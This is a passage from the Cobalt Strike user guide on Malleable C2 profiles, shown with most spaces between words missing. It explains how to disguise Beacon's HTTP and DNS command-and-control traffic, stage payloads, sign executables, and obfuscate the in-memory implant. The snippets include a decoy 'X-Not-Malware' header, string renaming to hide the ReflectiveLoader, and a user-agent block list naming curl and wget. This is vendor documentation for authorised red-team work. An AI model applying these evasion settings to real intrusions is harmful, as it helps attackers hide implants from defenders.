+parameters.Usetheparameterstatementwithintheclientblocktoaddanarbitraryparameter
+toanHTTPGETorPOSTtransaction.
+ThiscodewillforceBeacontoadd?bar=blahtothe/foobarURIwhenitmakesarequest.
+http-get {
+client {
+parameter "bar" "blah";
+UsetheheaderstatementwithintheclientorserverblockstoaddanarbitraryHTTPheaderto
+theclient’srequestorserver’sresponse.Thisheaderstatementaddsanindicatortoput
+networksecuritymonitoringteamsatease.
+http-get {
+server {
+header "X-Not-Malware" "I promise!";
+TheProfileInterpreterwillInterpretyourheaderandparameterstatementsInorder.Thatsaid,
+theWinINetorWinHTTP(client)andCobaltStrikewebserverhavethefinalsayaboutwherein
+thetransactiontheseindicatorswillappear.
+SeeHTTP Host Profiles on page 140forinstructionstoincludecustomizedheadersand
+parametersforspecifichostnames.
+Options
+YoumayconfigureBeacon’sdefaultsthroughtheprofilefile.Therearetwotypesofoptions:
+globalandlocaloptions.TheglobaloptionschangeaglobalBeaconsetting.Localoptionsare
+transactionspecific.Youmustsetlocaloptionsintherightcontext.Usethesetstatementtoset
+anoption.
+set "sleeptime" "1000";
+Hereareafewoptions:
+Option Context Default Value Changes
+data_jitter 0 Appendrandom-lengthstring(upto
+data_jittervalue)tohttp-getandhttp-
+postserveroutput.
+CobaltStrikeUserGuide www.fortra.com page:134
+
+MalleableCommandandControl/ProfileLanguage
+Option Context Default Value Changes
+headers_remove Comma-separatedlistofHTTPclient
+headerstoremovefromBeaconC2
+host_stage true HostpayloadforstagingoverHTTP,
+HTTPS,orDNS.Requiredbystagers.
+jitter 0 Defaultjitterfactor(0-99%)
+Thispropertycannotbeusedwhenthe
+sleepoptionisincludedintheprofile.
+pipename msagent_## DefaultnameofpipetouseforSMB
+Beacon’speer-to-peercommunication.
+Each#isreplacedwitharandomhex
+value.
+pipename_stager status_## NameofpipetouseforSMBBeacon’s
+namedpipestager.Each#isreplaced
+witharandomhexvalue.
+sample_name MyProfile Thenameofthisprofile(usedinthe
+IndicatorsofCompromisereport)
+sleep Defaultsleeptimedefinedaseither:
+secondsjitter(e.g.'2025')
+or
+[n]d[n]h[n]m[n]s[n]j(e.g.'1d13h34m
+45s25j')
+Thispropertycannotbeusedwhenthe
+sleeptimeandjitteroptionsare
+includedintheprofile.
+sleeptime 60000 Defaultsleeptime(inmilliseconds).
+Thispropertycannotbeusedwhenthe
+sleepoptionisincludedintheprofile.
+smb_frame_header PrependheadertoSMBBeacon
+messages
+ssh_banner CobaltStrike SSHclientbanner
+4.2
+ssh_pipename postex_ssh_ NameofpipeforSSHsessions.Each#
+#### isreplacedwitharandomhexvalue.
+CobaltStrikeUserGuide www.fortra.com page:135
+
+MalleableCommandandControl/ProfileLanguage
+Option Context Default Value Changes
+steal_token_ Blank/0 Setsthedefaultusedbysteal_token
+access_mask (TOKEN_ALL_ beaconcommandandbsteal_token
+ACCESS) beaconaggressorscriptcommandfor
+theOpenProcessTokenfunctions
+"DesiredAccess".
+Suggestion:use"11"for"TOKEN_
+DUPLICATE|TOKEN_ASSIGN_
+PRIMARY|TOKEN_QUERY"
+tasks_max_size 1048576 Themaximumsize(inbytes)oftask(s)
+andproxydatathatcanbetransferred
+throughacommunicationchannelata
+checkin
+tasks_proxy_max_ 921600 Themaximumsize(inbytes)ofproxy
+size datatotransferviathecommunication
+channelatacheckin.
+tasks_dns_proxy_ 71680 Themaximumsize(inbytes)ofproxy
+max_size datatotransferviatheDNS
+communicationchannelatacheckin.
+tcp_frame_header PrependheadertoTCPBeacon
+messages
+tcp_port 4444 DefaultTCPBeaconlistenport
+uri http-get, [required TransactionURI
+http-post option]
+uri_x86 http-stager x86payloadstageURI
+uri_x64 http-stager x64payloadstageURI
+useragent Internet DefaultUser-AgentforHTTPcomms.
+Explorer
+(Random)
+verb http-get, GET,POST HTTPVerbtousefortransaction
+http-post
+Withtheurioption,youmayspecifymultipleURIsasaspaceseparatedstring.CobaltStrike’s
+webserverwillbindalloftheseURIsanditwillassignoneoftheseURIstoeachBeaconhost
+whentheBeaconstageisbuilt.
+Eventhoughtheuseragentoptionexists;youmayusetheheaderstatementtooverridethis
+option.
+AdditionalConsiderationsfor the'task_' Settings
+CobaltStrikeUserGuide www.fortra.com page:136
+
+MalleableCommandandControl/ProfileLanguage
+Thetasks_max_size,tasks_proxy_max_size,andtasks_dns_proxy_max_sizeworktogetherto
+createadatabuffertobetransferredtobeaconwhenacheckinoccurs.Whenthebeacon
+checksinitrequestsalistoftasksandproxydatathatisreadytobetransferredtothisbeacon
+anditschildren.Thedatabufferstartstofillwithtask(s)followedbyproxydatafortheparent
+beacon.Thenitcontinuesthispatternforeachchildbeaconuntilnomoretasksorproxydatais
+availableorthetasks_max_sizesettingwillbeexceededbythenexttaskorproxydata.
+Thetasks_max_sizecontrolsthemaximumsizeinbytesadatabufferfilledwithtasksand
+proxydatacanbetotransferittobeaconthroughDNS,HTTP,HTTPS,andPeer-to-Peer
+communicationchannels.Mostofthetimethedefaultsarefine,howeverthereareoccasions
+whenacustomtaskwillexceedthemaximumsizeandcannotbesent.Forexample,youuse
+theexecute-assemblywithanexecutablelargerthan1MBinsizeandthefollowingmessageis
+displayedintheteamserverandbeaconconsoles.
+[TeamServerConsole]
+Droppingtaskfor40147050!Tasksizeof1389584bytesisoverthemaxtasksizelimitof
+1048576bytes.
+[BeaconConsole]
+Tasksizeof1389584bytesisoverthemaxtasksizelimitof1048576bytes.
+Increasingthetasks_max_sizesettingwillallowthiscustomtasktobesent.However,itwill
+requirerestartingtheteamserverandgeneratingnewbeaconsasthetasks_max_sizeis
+patchedintotheconfigurationsettingswhenabeaconisgeneratedandcannotbemodified.
+Thissettingalsoaffectshowmuchheapmemorybeaconallocatestoprocesstasks.
+Best Practices:
+l Determinethelargesttasksizethatwillbesenttoabeacon.Thiscanbedonethrough
+testingandlookingforthemessageaboveorinvestigatingyourcustom objects
+(executables,dlls,etc)thatareusedinyourengagements.Oncethisisdeterminedadd
+someextraspacetothevalue.Usingtheinformationfrom theaboveexampleuse
+1572864(1.5MB)asthetasks_max_size.Thereasontohaveextraspaceisbecausea
+smallertaskmayfollowthelargertasktoreadtheresponse.
+l Whenthetasks_max_sizevalueisdeterminedupdatethetask_max_sizesettinginyour
+profileandstarttheteam serverandgenerateyourbeaconartifactstodeployonyour
+targetsystems.
+l Ifyourinfrastructurerequiresbeaconsgeneratedfrom otherteam serverstoconnect
+witheachotherthroughPeer-to-Peercommunicationchannels,thenthissettingshould
+beupdatedonallteam servers.Otherwise,abeaconwillignorearequestwhenit
+exceedsitsconfiguredsize.
+l IfyouareusinganExternaC2listeneranupdatewouldberequiredtosupporttasks_
+max_sizelargerthanthedefaultsizeof1MB.
+CobaltStrikeUserGuide www.fortra.com page:137
+
+MalleableCommandandControl/HTTPStaging
+Whenexecutingalargetaskavoidqueueingitwithothertasks,especiallyifthisisbeing
+executedonabeaconusingpeer-to-peercommunicationchannels(SMBandTCP)asitcould
+bedelayedforseveralcheckinsdependingonthenumberofalreadyqueuedtasksandproxy
+datatosend.ThereasoniswhenataskisaddedithasasizeofXbyteswhichreducesthetotal
+availablespaceavailableforaddingadditionaltasks.Inaddition,proxyingdatathrougha
+beaconwillalsoreducetheamountofavailablespaceforsendingalargetask.Whenataskis
+delayedthefollowingmessageisdisplayedintheteamserverandbeaconconsoles.
+[TeamServerConsole]
+Chunkingtasksfor123!Unabletoaddtaskof787984bytesasitisovertheavailablesizeof
+260486bytes.2task(s)onholduntilnextcheckin.
+[BeaconConsole]
+Unabletoaddtaskof787984bytesasitisovertheavailablesizeof260486bytes.2task(s)
+onholduntilnextcheckin.
+Thetasks_dns_proxy_max_size(DNSchannel)andtasks_proxy_max_size(Otherchannels)
+controlsthesizeofproxydatainbytestobesenttobeacon.Bothsettingsneedtobelessthan
+thetasks_max_sizesetting.Itisrecommendednottomodifythesesettingsasthedefaultsizes
+arefine.Howthesesettingsworkiswhenitistimetoaddproxydatatothedatabufferfora
+parentbeaconitusesthechannelsproxy_max_sizesettingminusthecurrenttasklength,which
+canbeeitherapositiveornegativevalue.Ifitisapositivevalue,thentheproxydatawillbe
+addeduptothatvalue.ifitisanegativevaluetheproxydataisskippedforthischeckin.Fora
+childbeacontheproxy_max_sizeistemporarilyreducedbasedontheavailabledatabuffer
+spaceleftfromprocessingtheparentandpriorchildren.
+HTTP Staging
+Beaconisastagedpayload.Thismeansthepayloadisdownloadedbyastagerandinjected
+intomemory.Yourhttp-getandhttp-postindicatorswillnottakeeffectuntilBeaconisin
+memoryonyourtarget.MalleableC2’shttp-stagerblockcustomizestheHTTPstagingprocess.
+http-stager {
+set uri_x86 "/get32.gif";
+set uri_x64 "/get64.gif";
+Theuri_x86optionsetstheURItodownloadthex86payloadstage.Theuri_x64optionsetsthe
+URItodownloadthex64payloadstage.
+client {
+parameter "id" "1234";
+header "Cookie" "SomeValue";
+}
+CobaltStrikeUserGuide www.fortra.com page:138
+
+MalleableCommandandControl/ABeaconHTTPTransactionWalk-through
+Theclientkeywordunderthecontextofhttp-stagerdefinestheclientsideoftheHTTP
+transaction.UsetheparameterkeywordtoaddaparametertotheURI.Usetheheaderkeyword
+toaddaheadertothestager’sHTTPGETrequest.
+server {
+header "Content-Type" "image/gif";
+output {
+prepend "GIF89a";
+print;
+}
+}
+Theserverkeywordunderthecontextofhttp-stagerdefinestheserversideoftheHTTP
+transaction.Theheaderkeywordaddsaserverheadertotheserver’sresponse.Theoutput
+keywordundertheservercontextofhttp-stagerisadatatransformtochangethepayload
+stage.Thistransformmayonlyprependandappendstringstothestage.Usetheprint
+terminationstatementtoclosethisoutputblock.
+ABeacon HTTP Transaction Walk-through
+Toputallofthistogether,ithelpstoknowwhataBeacontransactionlookslikeandwhichdata
+issentwitheachrequest.
+AtransactionstartswhenaBeaconmakesanHTTPGETrequesttoCobaltStrike’swebserver.
+Atthistime,Beaconmustsendmetadatathatcontainsinformationaboutthecompromised
+system.
+TIP:
+Sessionmetadataisanencryptedblobofdata.Withoutencoding,itisnotsuitablefor
+transportinaheaderorURIparameter.Alwaysapplyabase64,base64url,ornetbios
+statementtoencodeyourmetadata.
+CobaltStrike’swebserverrespondstothisHTTPGETwithtasksthattheBeaconmustexecute.
+Thesetasksare,initially,sentasoneencryptedbinaryblob.Youmaytransformthisinformation
+withtheoutputkeywordundertheservercontextofhttp-get.
+AsBeaconexecutesitstasks,itaccumulatesoutput.Afteralltasksarecomplete,Beacon
+checksifthereisoutputtosend.Ifthereisnooutput,Beacongoestosleep.Ifthereisoutput,
+BeaconinitiatesanHTTPPOSTtransaction.
+TheHTTPPOSTrequestmustcontainasessionidinaURIparameterorheader.CobaltStrike
+usesthisinformationtoassociatetheoutputwiththerightsession.Thepostedcontentis,
+CobaltStrikeUserGuide www.fortra.com page:139
+
+MalleableCommandandControl/HTTPHostProfiles
+initially,anencryptedbinaryblob.Youmaytransformthisinformationwiththeoutputkeyword
+undertheclientcontextofhttp-post.
+CobaltStrike’swebservermayrespondtoanHTTPPOSTwithanythingitlikes.Beacondoes
+notconsumeorusethisinformation.YoumayspecifytheoutputofHTTPPOSTwiththeoutput
+blockundertheservercontextofhttp-post.
+NOTE:
+Whilehttp-getusesGETbydefaultandhttp-postusesPOSTbydefault,you’renotstuck
+withtheseoptions.Usetheverboptiontochangethesedefaults.There’salotofflexibility
+here.
+Thistablesummarizesthesekeywordsandthedatatheysend:
+Request Component Block Data
+http-get client metadata Sessionmetadata
+http-get server output Beacon’stasks
+http-post client id SessionID
+http-post client output Beacon’sresponses
+http-post server output Empty
+http-stager server output Encodedpayloadstage
+HTTP Host Profiles
+HostProfilesisusedtodefineHTTPcharacteristics(uri,headers,andparameters)thatwillbe
+usedfortheHTTP/HTTPScommunicationtrafficforaspecifichostname.HostProfilesis
+optional.HostProfilescanbedefinedformultiplehostnames.
+About Dynamic Data
+Somefieldsinhttp-host-profilesgroupsupportadynamicvaluesyntax.Beaconswillrandomly
+selectoneoftheoptionalvaluesinthespecifieddynamicsyntax.Dynamicsyntaxiswrappedby
+squarebracketswithvaluesseparatedby"|".
+Feature Example Resolves to
+[example.abc|sample.def|demo.ghi] example.abc
+Dynamicsyntaxcanbe
+sample.def
+anentirevalue.
+demo.ghi
+CobaltStrikeUserGuide www.fortra.com page:140
+
+MalleableCommandandControl/HTTPHostProfiles
+Feature Example Resolves to
+prefix/[a|b]/suffix prefix/a/suffix
+Dynamicsyntaxcanbe
+prefix/b/suffix
+embeddedinstatictext.
+abc/folder[1||3|]/xyz abc/folder1/xyz
+Dynamicsyntaxcanhave
+abc/folder/xyz
+oneormoreblank
+abc/folder3/xyz
+optionsasaselected
+abc/folder/xyz
+value.
+[abc|xyz]/[123|456]/
+Dynamicsyntaxcanhave
+[index.html|hello.js|home.jsp]
+multipledynamicitems.
+http-host-profiles {
+profile {
+set host-name "one.ytrewq.com";
+http-get {
+set uri "/[a|b|c|d]/ytrewq/get.js";
+header "ytrewq-header-[a|b|c]" "static-value";
+parameter "ytrewq-parameter" "value-[x|y|z]";
+parameter "ytrewq-[a|b|c]" "value-[x|y|z]";
+## Example of param name that will be dropped when it resolves as blank
+parameter "[p1|||p4]" "[a|b|c]";
+}
+http-post {
+set uri "/[a|b|c|d]/ytrewq/[post1|post2|post3|post4].js";
+header "ytrewq-header-[a|b|c]" "static-value";
+parameter "ytrewq-parameter" "value-[x|y|z]";
+parameter "ytrewq-[a|b|c]" "value-[x|y|z]";
+parameter "[p1|||p4]" "[a|b|c]";
+}
+}
+profile {
+set host-name "two.ytrewq.com";
+http-get {
+set uri "/ytrewq/get/[2|two|dos]/[a|b|c].js";
+}
+http-post {
+set uri "/ytrewq/post/[2|two|dos]/[a|b|c].js";
+}
+}
+}
+Thesettingsare:
+CobaltStrikeUserGuide www.fortra.com page:141
+
+MalleableCommandandControl/HTTPHostProfiles
+Field Description
+host-name Thehost-namefieldisafixedstringthatlinkstheHostProfiletomatching
+HTTP HostsfieldontheHTTP/HTTPSlistenerdefinitions.Thefieldis
+requiredandcasesensitive.ItdoesNOTsupportembeddeddynamic
+[a|b|c]
+syntax(“ ”).
+uri l Appliestoprofile.http-get.uriandprofile.http-post.uri.
+l ResolvedURILength:
+o GetMaxLength=127
+o PostMaxLength=64
+l Optional,butwhenspecified,itcannotresolvetoablankvalue.
+o NOTALLOWED:[/aaa|/bbb||]
+l Muststartwith“/“.
+l MustresolvetovalidHTTPURIsyntax.
+parameter l Appliestoprofile.http-get.uriandprofile.http-post.uri.
+l Upto10parametersinasingleHostProfileget/postdefinition.
+l Supportsembeddeddynamicdatasyntaxinthenameandvalue.
+l If/whenthenameresolvestoablankvalue,theparameterwillbe
+dropped.
+l Blankparametervaluesaresupported.
+header l Appliestoprofile.http-get.uriandprofile.http-post.uri.
+l Upto10headersinasingleHostProfileget/postdefinition.
+l Supportsembeddeddynamicdatasyntaxinthenameandvalue.
+l If/whenthenameresolvestoablankvalue,theheaderwillbe
+dropped.
+l If/whenthevalueresolvestoablankvalue,theheaderwillbe
+dropped.
+NOTE:
+Theheaderandparameterfieldsaboveallowhostnamespecificconfigurationinaddition
+totheheadersandparametersdescribedintheProfileLanguage/HeadersandParameters
+sectionintheguide.
+Restrictions
+CobaltStrikeUserGuide www.fortra.com page:142
+
+MalleableCommandandControl/HTTPServerConfiguration
+l Upto8hostprofilesusedperlistener/beacon
+l 1024bytelimitonspaceforallprofilesusedinabeacon(usesmallsimpledefinitionsif
+possible)
+l Maximum tokensinadynamicfield:32
+Host Profile Linting:
+l ThelintingprocessDOES NOTincludeHostProfilesettingsinthedefault/variantprofile
+sampledataitgenerates.Theprocessdoesnotknowwhichhostswillbeassignedto
+whichlistenersandwhichlistenerswillbeassignedtothedefaultorvariousprofile
+variantstogeneratetheexamples.
+l Thelintingprocessincludesseveralchecksforthedefinedhostprofiles.
+l TheHostProfileget/postURI’smustresolvetouniqueURI’stoidentifyHTTPrequests
+appropriately.ThelintingfeaturewilltestforpossibleURIcollisions.Lintingdoesnot
+knowwhichprofilevariantsmightusespecifichostprofiles,sothelintingprocess
+checksforduplicatesinalargerscope(allvariants)thanmaybeactuallyrequired.
+l LintingrequirestheprocessresolveeverypotentialURI,andheader/parametername.
+Complexdynamicdatacanresultinverylargesetsofresults,whichwillimpact
+performanceandmemory.
+HTTP Server Configuration
+Thehttp-configblockhasinfluenceoverallHTTPresponsesservedbyCobaltStrike’sweb
+server.Here,youmayspecifyadditionalHTTPheadersandtheHTTPheaderorder.
+http-config {
+set headers "Date, Server, Content-Length, Keep-Alive,
+Connection, Content-Type";
+header "Server" "Apache";
+header "Keep-Alive" "timeout=5, max=100";
+header "Connection" "Keep-Alive”;
+set trust_x_forwarded_for "true";
+set block_useragents "curl*,lynx*,wget*";
+}
+set headers-ThisoptionspecifiestheordertheseHTTPheadersaredeliveredinanHTTP
+response.Anyheadersnotinthislistareaddedtotheend.
+header-ThiskeywordaddsaheadervaluetoeachofCobaltStrike’sHTTPresponses.Ifthe
+headervalueisalreadydefinedinaresponse,thisvalueisignored.
+CobaltStrikeUserGuide www.fortra.com page:143
+
+MalleableCommandandControl/Self-signedSSLCertificateswithSSLBeacon
+set trust_x_forwarded_for-ThisoptiondecidesifCobaltStrikeusestheX-Forwarded-For
+HTTPheadertodeterminetheremoteaddressofarequest.UsethisoptionifyourCobalt
+StrikeserverisbehindanHTTPredirector.
+block_useragentsandallow_useragents-Theseoptionsconfigurealistofuseragentsthat
+areblockedorallowedwitha404response.Bydefault,requestsfromuseragentsthat
+startwithcurl,lynx,orwgetareallblocked.Ifbotharespecified,block_useragentswill
+takeprecedenceoverallow_useragents.Theoptionvaluesupportsastringofcomma
+separatedvalues.Valuessupportsimplegenerics:
+Example Description
+notspecified Usethedefaultvalue(curl*,lynx*,wget*).Blockrequests
+fromuseragentsstartingwithcurl,lynx,orwget.
+blank(block_useragents) Nouseragentsareblocked.
+blank(allowuser_agents) Alluseragentsareallowed.
+something Block/Allowrequestswithuseragentequal'something'.
+something* Block/Allowrequestswithuseragentstartingwith
+'something'.
+*something Block/Allowrequestswithuseragentendingwith
+'something'.
+*something* Block/Allowrequestswithuseragentcontaining
+'something'.
+Self-signed SSL Certificates with SSL Beacon
+TheHTTPSBeaconusestheHTTPBeacon’sindicatorsinitscommunication.MalleableC2
+profilesmayalsospecifyparametersfortheBeaconC2server’sself-signedSSLcertificate.This
+isusefulifyouwanttoreplicateanactorwithuniqueindicatorsintheirSSLcertificate:
+https-certificate {
+set CN "bobsmalware.com";
+set O "Bob’s Malware";
+}
+Thecertificateparametersunderyourprofile’scontrolare:
+CobaltStrikeUserGuide www.fortra.com page:144
+
+MalleableCommandandControl/ValidSSLCertificateswithSSLBeacon
+Option Example Description
+C US Country
+CN beacon.cobaltstrike.com CommonName;Yourcallbackdomain
+L Washington Locality
+O Fortra,LLC OrganizationName
+OU CertificateDepartment OrganizationalUnitName
+ST DC StateorProvince
+validity 365 Numberofdayscertificateisvalidfor
+Valid SSL Certificates with SSL Beacon
+YouhavetheoptiontouseaValidSSLcertificatewithBeacon.UseaMalleableC2profileto
+specifyaJavaKeystorefileandapasswordforthekeystore.Thiskeystoremustcontainyour
+certificate’sprivatekey,therootcertificate,anyintermediatecertificates,andthedomain
+certificateprovidedbyyourSSLcertificatevendor.CobaltStrikeexpectstofindtheJava
+KeystorefileinthesamefolderasyourMalleableC2profile.
+https-certificate {
+set keystore "domain.store";
+set password "mypassword";
+}
+TheparameterstouseavalidSSLcertificateare:
+Option Example Description
+keystore domain.store JavaKeystorefilewithcertificateinformation
+password mypassword ThepasswordtoyourJavaKeystore
+HerearethestepstocreateaValidSSLcertificateforusewithCobaltStrike’sBeacon:
+1. Usethekeytoolprogram tocreateaJavaKeystorefile.Thisprogram willask“Whatis
+yourfirstandlastname?”Makesureyouanswerwiththefullyqualifieddomainnameto
+yourBeaconserver.Also,makesureyoutakenoteofthekeystorepassword.Youwill
+needitlater.
+$ keytool -genkey -keyalg RSA -keysize 2048 -keystore
+domain.store
+CobaltStrikeUserGuide www.fortra.com page:145
+
+MalleableCommandandControl/ProfileVariants
+2. UsekeytooltogenerateaCertificateSigningRequest(CSR).Youwillsubmitthisfileto
+yourSSLcertificatevendor.Theywillverifythatyouarewhoyouareandissuea
+certificate.Somevendorsareeasierandcheapertodealwiththanothers.
+$ keytool -certreq -keyalg RSA -file domain.csr -keystore
+domain.store
+3. ImporttheRootandanyIntermediateCertificatesthatyourSSLvendorprovides.
+$ keytool -import -trustcacerts -alias FILE -file FILE.crt -
+keystore domain.store
+4. Finally,youmustinstallyourDomainCertificate.
+$ keytool -import -trustcacerts -alias mykey -file domain.crt -
+keystore domain.store
+And,that’sit.YounowhaveaJavaKeystorefilethat’sreadytousewithCobaltStrike’sBeacon.
+Profile Variants
+MalleableC2profilefiles,bydefault,containoneprofile.It’spossibletopackvariationsofthe
+currentprofilebyspecifyingvariantblocksforhttp-beacon,https-certificate,http-get,http-post
+andhttp-stager.
+Avariantblockisspecifiedas[block name] “variant name” { … }.Here’savarianthttp-getblock
+named“MyVariant”:
+http-get "My Variant" {
+client {
+parameter "bar" "blah";
+Avariantblockcreatesacopyofthecurrentprofilewiththespecifiedvariantblocksreplacing
+thedefaultblocksintheprofileitself.Eachuniquevariantnamecreatesanewvariantprofile.
+Youmaypopulateaprofilewithasmanyvariantnamesasyoulike.
+VariantsareselectablewhenconfiguringanHTTPorHTTPSBeaconlistener.Variantsallow
+eachHTTPorHTTPSBeaconlistenertiedtoasingleteamservertohavenetworkIOCsthat
+differfromeachother.
+HTTP Beacons
+Allowsyoutospecifyattributesforgeneralattributesforthehttp(s)beacons.
+CobaltStrikeUserGuide www.fortra.com page:146
+
+MalleableCommandandControl/CodeSigningCertificate
+ThedefaultbeaconlibrarycansubsequentlybeoverriddenonUIDialogsandAggressor
+Commandsthatgeneratebeaconsasneeded.
+http-beacon {
+set library "winhttp";
+}
+http-beacon "variant-x" {
+set library "wininet";
+}
+Thesettingsare:
+Option Default Value Description
+library wininet Thelibraryattributeallowsusertospecifythedefault
+libraryusedbythegeneratedbeaconsusedbythe
+profile.
+Thelibrarydefaultsto"wininet",whichistheonly
+typeofbeaconpriortoversion4.9.Thelibraryvalue
+canbe"wininet"or"winhttp".
+Code Signing Certificate
+Payloads -> Windows Stager PayloadandWindows Stageless Payloadgiveyoutheoptionto
+signanexecutableorDLLfile.Tousethisoption,youmustspecifyaJavaKeystorefilewith
+yourcodesigningcertificateandprivatekey.CobaltStrikeexpectstofindtheJavaKeystorefile
+inthesamefolderasyourMalleableC2profile.
+code-signer {
+set keystore "keystore.jks";
+set password "password";
+set alias "server";
+}
+Thecodesigningcertificatesettingsare:
+Option Example Description
+alias server Thekeystore’saliasforthiscertificate
+CobaltStrikeUserGuide www.fortra.com page:147
+
+MalleableCommandandControl/DNSBeacons
+Option Example Description
+digest_ SHA256 Thedigestalgorithm
+algorithm
+keystore keystore.jks JavaKeystorefilewithcertificate
+information
+password mypassword ThepasswordtoyourJavaKeystore
+timestamp false Timestampthefileusingathird-party
+service
+timestamp_url http://timestamp.digicert.com URLofthetimestampservice
+DNS Beacons
+YouhavetheoptiontoshapetheDNSBeacon/ListenernetworktrafficwithMalleableC2.
+dns-beacon “optional-variant-name” {
+# Options moved into 'dns-beacon' group in 4.3:
+set dns_idle "1.2.3.4";
+set dns_max_txt "199";
+set dns_sleep "1";
+set dns_ttl "5";
+set maxdns "200";
+set dns_stager_prepend "doc-stg-prepend";
+set dns_stager_subhost "doc-stg-sh.";
+# DNS subhost override options added in 4.3:
+set beacon "doc.bc.";
+set get_A "doc.1a.";
+set get_AAAA "doc.4a.";
+set get_TXT "doc.tx.";
+set put_metadata "doc.md.";
+set put_output "doc.po.";
+set ns_response "zero";
+}
+Thesettingsare:
+Option Default Value Changes
+dns_idle 0.0.0.0 IPaddressusedtoindicatenotasksare
+availabletoDNSBeacon;Maskforother
+DNSC2values
+CobaltStrikeUserGuide www.fortra.com page:148
+
+MalleableCommandandControl/DNSBeacons
+Option Default Value Changes
+dns_max_txt 252 MaximumlengthofDNSTXTresponses
+fortasks
+dns_sleep 0 ForceasleeppriortoeachindividualDNS
+request.(inmilliseconds)
+dns_stager_prepend Prependtexttopayloadstagedeliveredto
+DNSTXTrecordstager
+dns_stager_subhost .stage.123456. SubdomainusedbyDNSTXTrecord
+stager.
+dns_ttl 1 TTLforDNSreplies
+maxdns 255 Maximumlengthofhostnamewhen
+uploadingdataoverDNS(0-255)
+beacon DNSsubhostprefixusedforbeaconing
+requests.(lowercasetext)
+get_A cdn. DNSsubhostprefixusedforArecord
+requests(lowercasetext)
+get_AAAA www6. DNSsubhostprefixusedforAAAArecord
+requests(lowercasetext)
+get_TXT api. DNSsubhostprefixusedforTXTrecord
+requests(lowercasetext)
+put_metadata www. DNSsubhostprefixusedformetadata
+requests(lowercasetext)
+put_output post. DNSsubhostprefixusedforoutput
+requests(lowercasetext)
+ns_response drop HowtoprocessNSRecordrequests.
+"drop"doesnotrespondtotherequest
+(default),"idle"respondswithArecordfor
+IPaddressfrom"dns_idle","zero"responds
+withArecordfor0.0.0.0
+Youcanuse"ns_response"whenaDNSserverisrespondingtoatargetwith"Serverfailure"
+errors.ApublicDNSResolvermaybeinitiatingNSrecordrequeststhattheDNSServerinCobalt
+StrikeTeamServerisdroppingbydefault.
+{target} {DNS Resolver} Standard query 0x5e06 A
+doc.bc.11111111.a.example.com
+{DNS Resolver} {target} Standard query response 0x5e06 Server failure A
+doc.bc.11111111.a.example.com
+CobaltStrikeUserGuide www.fortra.com page:149
+
+MalleableCommandandControl/ExercisingCautionwithMalleableC2
+Exercising Caution with Malleable C2
+MalleableC2givesyouanewlevelofcontroloveryournetworkandhostindicators.Withthis
+poweralsocomesresponsibility.MalleableC2isanopportunitytomakealotofmistakestoo.
+Hereareafewthingstothinkaboutwhenyoucustomizeyourprofiles:
+l EachCobaltStrikeinstanceusesoneprofileatatime.Ifyouchangeaprofileorloada
+newprofile,previouslydeployedBeaconscannotcommunicatewithyou.
+l Alwaysstayawareofthestateofyourdataandwhataprotocolwillallowwhenyou
+developadatatransform.Forexample,ifyoubase64encodemetadataandstoreitina
+URIparameter—it’snotgoingtowork.Why?Somebase64characters(+,=,and/)have
+specialmeaninginaURL.Thec2linttoolandProfileCompilerwillnotdetectthesetypes
+ofproblems.
+l Alwaystestyourprofiles,evenaftersmallchanges.IfBeaconcan’tcommunicatewith
+you,it’sprobablyanissuewithyourprofile.Edititandtryagain.
+l Trustthec2linttool.Thistoolgoesaboveandbeyondtheprofilecompiler.Thechecks
+aregroundedinhowthistechnologyisimplemented.Ifac2lintcheckfails,itmeans
+thereisarealproblem withyourprofile.
+CobaltStrikeUserGuide www.fortra.com page:150
+
+MalleablePE,ProcessInjection,andPostExploitation/Overview
+Malleable PE, Process Injection,
+and Post Exploitation
+Overview
+MalleableC2profilesaremorethancommunicationindicators.MalleableC2profilesalso
+controlBeacon’sin-memorycharacteristics,determinehowBeacondoesprocessinjection,and
+influenceCobaltStrike’spost-exploitationjobstoo.Thesectionsthatfollowdocumentthese
+extensionstotheMalleableC2language.
+PE and Memory Indicators
+ThestageblockinMalleableC2profilescontrolshowBeaconisloadedintomemoryandedit
+thecontentoftheBeaconDLL.
+stage {
+set userwx "false";
+set compile_time "14 Jul 2009 8:14:00";
+set image_size_x86 "512000";
+set image_size_x64 "512000";
+set obfuscate "true";
+transform-x86 {
+prepend "\x90\x90";
+strrep "ReflectiveLoader" "DoLegitStuff";
+}
+transform-x64 {
+# transform the x64 rDLL stage
+}
+stringw "I am not Beacon";
+}
+Thestage blockacceptscommandsthataddstringstothe.rdatasectionoftheBeaconDLL.
+Thestring commandaddsazero-terminatedstring.Thestringw commandaddsawide(UTF-
+16LEencoded)string.Thedata commandaddsyourstringas-is.
+CobaltStrikeUserGuide www.fortra.com page:151
+
+MalleablePE,ProcessInjection,andPostExploitation/PEandMemoryIndicators
+Thetransform-x86 andtransform-x64 blockspadandtransformBeacon’sReflectiveDLL
+stage.Theseblockssupportthreecommands:prepend,append,andstrrep.
+Theprepend commandinsertsastringbeforeBeacon’sReflectiveDLL.Theappend command
+addsastringaftertheBeaconReflectiveDLL.Makesurethatprependeddataisvalidcodefor
+thestage’sarchitecture(x86,x64).Thec2lintprogramdoesnothaveacheckforthis.The
+strrep commandreplacesastringwithinBeacon’sReflectiveDLL.
+ThestageblockacceptsseveraloptionsthatcontroltheBeaconDLLcontentandprovidehints
+tochangethebehaviorofBeacon’sReflectiveLoader:
+Option Example Description
+allocator HeapAlloc SethowBeacon'sReflectiveLoaderallocates
+memoryfortheagent.Optionsare:HeapAlloc,
+MapViewOfFile,andVirtualAlloc.
+cleanup false AskBeacontoattempttofreememoryassociated
+withtheReflectiveDLLpackagethatinitializedit.
+data_store_size 16 SethowmanyentriescanbestoredinBeaconData
+Store.
+magic_mz_x86 MZRE Overridethefirstbytes(MZheaderincluded)of
+Beacon'sReflectiveDLL.Validx86instructionsare
+required.FollowinstructionsthatchangeCPUstate
+withinstructionsthatundothechange.
+magic_mz_x64 MZAR Sameasmagic_mz_x86;affectsx64DLL
+magic_pe PE OverridethePEcharactermarkerusedbyBeacon's
+ReflectiveLoaderwithanothervalue.
+module_x861 xpsservices.dll Askthex86ReflectiveLoadertoloadthespecified
+libraryandoverwriteitsspaceinsteadofallocating
+memorywithVirtualAlloc.
+module_x641 xpsservices.dll Sameasmodule_x86;affectsx64loader
+obfuscate false ObfuscatetheReflectiveDLL’simporttable,
+overwriteunusedheadercontent,andask
+ReflectiveLoadertocopyBeacontonewmemory
+withoutitsDLLheaders.
+sleep_mask false ObfuscateBeaconandit'sheap,in-memory,priorto
+sleeping.
+smartinject false Useembeddedfunctionpointerhintstobootstrap
